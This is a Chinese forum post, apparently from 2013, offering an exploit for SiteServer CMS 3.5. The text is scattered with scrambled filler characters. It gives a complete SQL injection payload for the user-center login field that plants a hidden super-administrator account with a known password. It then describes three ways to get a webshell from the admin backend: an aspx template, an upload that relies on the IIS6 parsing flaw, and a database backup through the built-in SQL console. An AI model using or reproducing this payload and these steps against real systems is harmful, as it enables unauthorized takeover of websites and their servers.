经测试秒杀最新的3.5版
! y1 T# h ?" U8 R! B( F3 @stieserver官网:www.siteserver.cn4 f+ m* G+ t) ?. e" }$ u) D
EXP:; ~/ ^ i, B4 R7 R$ @ S# v/ S* q
直接访问UserCenter/login.aspx F) }- b$ S. f
用户名处输入:
' S" P$ ~4 `" ]
" X- L3 v2 m& K& G123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 D- I( F1 x* a5 x密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。+ y% N$ C4 Z: E1 I+ C
之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 O) b3 X6 R5 _7 _7 k7 R# o后台拿webshell的三种方法:4 g1 o$ \! R# C! e0 l
一、
' z" {& g$ b. Q4 K3 d4 f- P站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx7 f# A+ O- J! U3 i. X# k
二、8 h6 [6 J9 [# a9 G% k8 j/ B9 `# E
成员权限-》添加用户-》用户名为:1.asp
- f7 P& t; M: l i( O- [http://127.0.0.1/usercenter/6 |; }4 {, l% k" b3 f- ?6 j4 b
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ j' R2 L- g4 k2 s
(ps:后台添加用户时不会验证是否含有非法字符)
1 B! s8 T$ J7 F& c三、+ k& e) x' {5 f; \$ M+ |9 Z
系统工具-》实用工具-》机器参数查看! V A& j* b1 f+ @+ o0 Q6 N! |
可以看到数据库类型、名称,WEB路径
$ [$ ~% F5 J( T6 y系统工具-》数据库工具-》SQL语句查询0 v# l5 Z7 }* J6 X6 ]$ a
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对